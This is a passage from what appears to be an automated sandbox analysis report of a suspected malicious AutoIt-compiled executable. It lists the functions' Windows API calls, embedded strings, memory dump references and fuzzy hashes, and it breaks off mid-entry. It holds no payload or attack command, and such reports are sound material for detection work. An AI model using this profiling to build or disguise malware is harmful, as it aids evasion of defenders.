                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028EF
                                    • GetSystemMetrics.USER32(00000008), ref: 00F028F7
                                    • GetSystemMetrics.USER32(00000004), ref: 00F0291C
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F02939
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F02949
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F0297C
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F02990
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00F029AE
                                    • GetStockObject.GDI32(00000011), ref: 00F029CA
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F029D5
                                      • Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
                                      • Part of subcall function 00F02344: ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    • SetTimer.USER32(00000000,00000000,00000028,00F01256), ref: 00F029FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: 0f7159534e4ff87cf4d2fdac7b8fe98d467ebbe372d135f818d4ac6ecfbc49c2
                                    • Instruction ID: c1641deba7690cf3d6eeef80584de957901df720f136d8304a94acd0b8fa1ae6
                                    • Opcode Fuzzy Hash: 0f7159534e4ff87cf4d2fdac7b8fe98d467ebbe372d135f818d4ac6ecfbc49c2
                                    • Instruction Fuzzy Hash: E2B14E75A0020A9FDB14DF68DD49BED7BA4FF08324F108229FA15E72D0DB74A855EB60
                                    Function 00F646D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscat$C1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                    • API String ID: 2258151342-1459072770
                                    • Opcode ID: fe663b915e34dc11c9cfc257b1bda15f307d520bcc432f5819399f0597c5cb23
                                    • Instruction ID: e6b9bf28255f76566401f74d93ae1dc265675293c52502c6a2da83e27f201d1a
                                    • Opcode Fuzzy Hash: fe663b915e34dc11c9cfc257b1bda15f307d520bcc432f5819399f0597c5cb23
                                    • Instruction Fuzzy Hash: 0241D572A042147AEB14BA74AC42EFF776CEF41720F040169F905A6182EB69E901B7A5
                                    Function 00F84069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00F840F6
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F841B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: b993b985a701d7a31ab39d5b20668c7fb07c4a7fa6061cc129c3fa5d2d719033
                                    • Instruction ID: 8cea6e427d21b5ea2c59d947f8c58efb4559791a0f08c25218050e3e440337f0
                                    • Opcode Fuzzy Hash: b993b985a701d7a31ab39d5b20668c7fb07c4a7fa6061cc129c3fa5d2d719033
                                    • Instruction Fuzzy Hash: 74A170316182029FCB14FF10CD51AAAB3A5BF84314F144968B8969B6D3EB78FD05FB51
                                    Function 00F752F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00F75309
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00F75314
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F7531F
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00F7532A
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00F75335
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00F75340
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00F7534B
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00F75356
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00F75361
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00F7536C
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00F75377
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00F75382
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00F7538D
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00F75398
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00F753A3
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00F753AE
                                    • GetCursorInfo.USER32(?), ref: 00F753BE
                                    • GetLastError.KERNEL32(00000001,00000000), ref: 00F753E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$ErrorInfoLast
                                    • String ID:
                                    • API String ID: 3215588206-0
                                    • Opcode ID: f9f01e14b8d74ebec2b13c5ae292829d8a02ddac53d48f75f29065b8da7fbd8b
                                    • Instruction ID: 938eefcaf344eec8563ae276e576d6089a97a8edff3e5efedcefbb0d220b22da
                                    • Opcode Fuzzy Hash: f9f01e14b8d74ebec2b13c5ae292829d8a02ddac53d48f75f29065b8da7fbd8b
                                    • Instruction Fuzzy Hash: 46416470E083196ADB109FBA8C4996FFFF8EF51B60B10452FE509E7291DAB89401DF51
                                    Function 00F5AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F5AAA5
                                    • __swprintf.LIBCMT ref: 00F5AB46
                                    • _wcscmp.LIBCMT ref: 00F5AB59
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F5ABAE
                                    • _wcscmp.LIBCMT ref: 00F5ABEA
                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F5AC21
                                    • GetDlgCtrlID.USER32(?), ref: 00F5AC73
                                    • GetWindowRect.USER32(?,?), ref: 00F5ACA9
                                    • GetParent.USER32(?), ref: 00F5ACC7
                                    • ScreenToClient.USER32(00000000), ref: 00F5ACCE
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F5AD48
                                    • _wcscmp.LIBCMT ref: 00F5AD5C
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F5AD82
                                    • _wcscmp.LIBCMT ref: 00F5AD96
                                      • Part of subcall function 00F2386C: _iswctype.LIBCMT ref: 00F23874
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                    • String ID: %s%u
                                    • API String ID: 3744389584-679674701
                                    • Opcode ID: 63dbcfa5cc9a7174853b001893a2acae7fc5e3d2e379ad634955186b662c9a14
                                    • Instruction ID: ad8b02330c73bb3c867245ac88797a26983fd826690542f5a3f4d66429a113f4
                                    • Opcode Fuzzy Hash: 63dbcfa5cc9a7174853b001893a2acae7fc5e3d2e379ad634955186b662c9a14
                                    • Instruction Fuzzy Hash: F6A1C471604606AFD714DF24C884BEAB7E8FF44326F104729FE99C2150D734E969EB92
                                    Function 00F5B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00F5B3DB
                                    • _wcscmp.LIBCMT ref: 00F5B3EC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F5B414
                                    • CharUpperBuffW.USER32(?,00000000), ref: 00F5B431
                                    • _wcscmp.LIBCMT ref: 00F5B44F
                                    • _wcsstr.LIBCMT ref: 00F5B460
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F5B498
                                    • _wcscmp.LIBCMT ref: 00F5B4A8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F5B4CF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F5B518
                                    • _wcscmp.LIBCMT ref: 00F5B528
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00F5B550
                                    • GetWindowRect.USER32(00000004,?), ref: 00F5B5B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: 1ccf2ab57134d54ccb51b99a61d147568901f49131fb3b1e95c3f623976c28b0
                                    • Instruction ID: 21edb2aa0c884e171c0fbcac62e168f91fabdbc89b7b0f6265b1b6df7c88ffcc
                                    • Opcode Fuzzy Hash: 1ccf2ab57134d54ccb51b99a61d147568901f49131fb3b1e95c3f623976c28b0
                                    • Instruction Fuzzy Hash: C681E3714083099FDB14CF10C885FAA7BE8EF44325F1881A9FE858A096EB34DD4DEB61
                                    Function 00F5B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: c602471600ef33a7514b16e1efcd976faacd0394f355923653278ff337657a03
                                    • Instruction ID: 14f250b5489ae1f8a941ebf6302a6d335bb0fdc64ceb8b108a5cc69b973b3c1a
                                    • Opcode Fuzzy Hash: c602471600ef33a7514b16e1efcd976faacd0394f355923653278ff337657a03
                                    • Instruction Fuzzy Hash: A531E631E08305A6DB15FA61CD43FEE77A59F24751F600029FA41710D1EFA9AE08FDA2
                                    Function 00F5C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 00F5C4D4
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F5C4E6
                                    • SetWindowTextW.USER32(?,?), ref: 00F5C4FD
                                    • GetDlgItem.USER32(?,000003EA), ref: 00F5C512
                                    • SetWindowTextW.USER32(00000000,?), ref: 00F5C518
                                    • GetDlgItem.USER32(?,000003E9), ref: 00F5C528
                                    • SetWindowTextW.USER32(00000000,?), ref: 00F5C52E
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F5C54F
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F5C569
                                    • GetWindowRect.USER32(?,?), ref: 00F5C572
                                    • SetWindowTextW.USER32(?,?), ref: 00F5C5DD
                                    • GetDesktopWindow.USER32 ref: 00F5C5E3
                                    • GetWindowRect.USER32(00000000), ref: 00F5C5EA
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F5C636
                                    • GetClientRect.USER32(?,?), ref: 00F5C643
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F5C668
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F5C693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: 2bb9d2f61da70bb1429f7f08812a924df524020bd00e812cf7c4a670be985876
                                    • Instruction ID: 5be3a12a24c019350ff126e638978e88b9d4029dc236dbe3bfe3756535da7801
                                    • Opcode Fuzzy Hash: 2bb9d2f61da70bb1429f7f08812a924df524020bd00e812cf7c4a670be985876
                                    • Instruction Fuzzy Hash: 6E518171900709EFDB20DFA8CD85BAEBBF5FF04705F004528E687A25A0D774A949EB50
                                    Function 00F8A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F8A4C8
                                    • DestroyWindow.USER32(?,?), ref: 00F8A542
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F8A5BC
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F8A5DE
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A5F1
                                    • DestroyWindow.USER32(00000000), ref: 00F8A613
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F8A64A
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A663
                                    • GetDesktopWindow.USER32 ref: 00F8A67C
                                    • GetWindowRect.USER32(00000000), ref: 00F8A683
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F8A69B
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F8A6B3
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 1297703922-3619404913
                                    • Opcode ID: b7972920fcef1214787d533e1f45515cd3d6dfabdd80ef6573ef81826d61cba9
                                    • Instruction ID: 11c207050925302fb53f8c6c4b7b02a62476ec0ec92d6cb1071129c9b6076ac9
                                    • Opcode Fuzzy Hash: b7972920fcef1214787d533e1f45515cd3d6dfabdd80ef6573ef81826d61cba9
                                    • Instruction Fuzzy Hash: 52718D71544209AFE720DF28CC49FAA7BE5FF88314F08452DF985872A1E774E946EB12
                                    Function 00F84619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00F846AB
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F846F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: be5b0ddcfa1b379dca7442105324315c6b496db89c645dbff30b11cc7c4ab9cc
                                    • Instruction ID: 07dc0b80c0088e9cad880e25e23c0290dc719c0afa7e1fb4040c3e6ec1f4c053
                                    • Opcode Fuzzy Hash: be5b0ddcfa1b379dca7442105324315c6b496db89c645dbff30b11cc7c4ab9cc
                                    • Instruction Fuzzy Hash: 67916C356083129FCB14EF24C851AAAB7A1AF84314F04445CF8965B3A3DB78FD4AFB81
                                    Function 00F8BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F8BB6E
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F89431), ref: 00F8BBCA
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8BC03
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F8BC46
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8BC7D
                                    • FreeLibrary.KERNEL32(?), ref: 00F8BC89
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F8BC99
                                    • DestroyCursor.USER32(?), ref: 00F8BCA8
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F8BCC5
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F8BCD1
                                      • Part of subcall function 00F2313D: __wcsicmp_l.LIBCMT ref: 00F231C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    • Opcode ID: 7c2613964908b9472012a5633a1ab78a46cebc63e51e334135cdcf03690bb867
                                    • Instruction ID: ca3b56948900441423349b4efc3e363762d3b2d4d07f7976dba03d868de0412b
                                    • Opcode Fuzzy Hash: 7c2613964908b9472012a5633a1ab78a46cebc63e51e334135cdcf03690bb867
                                    • Instruction Fuzzy Hash: B961D071A00619BEEB14EF64CC85FFE77A8FB08720F104115F815D61D1DB78A994EBA0
                                    Function 00F6A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • CharLowerBuffW.USER32(?,?), ref: 00F6A636
                                    • GetDriveTypeW.KERNEL32 ref: 00F6A683
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A6CB
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A702
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A730
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
